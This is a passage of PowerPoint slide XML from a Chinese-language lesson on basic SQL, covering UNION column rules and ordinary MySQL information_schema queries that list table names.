            <a:off x="447869" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857112" y="553461"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838490" y="1088971"/>
            <a:ext cx="7120860" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6748199B-1474-4CA3-8BC4-934132A5F90A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569570" y="1858668"/>
            <a:ext cx="9453229" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>表中重要的列：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>当前用户的数据库中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所有表的表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表所在的数据库名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368945C2-5278-4C21-B844-37A722C37B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577426" y="3482028"/>
            <a:ext cx="3057247" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>查询所有的表名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{459872D3-9E8F-4502-8157-7E634C2017F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569570" y="4093281"/>
            <a:ext cx="10715522" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BDA51B-D57F-4157-AF31-3E79619236E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577426" y="4694107"/>
            <a:ext cx="5391219" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>查询库名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>中所有表的表名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CFD1D8-D6C1-4423-9BCE-8E8FA5E77646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569570" y="5280782"/>
            <a:ext cx="11493476" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>														where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>='xxx';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1585176172"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857112" y="553461"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838490" y="1088971"/>
            <a:ext cx="7500771" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6748199B-1474-4CA3-8BC4-934132A5F90A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577426" y="1676573"/>
            <a:ext cx="9833141" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Columns</a:t>
            </a:r>
            <a:r>
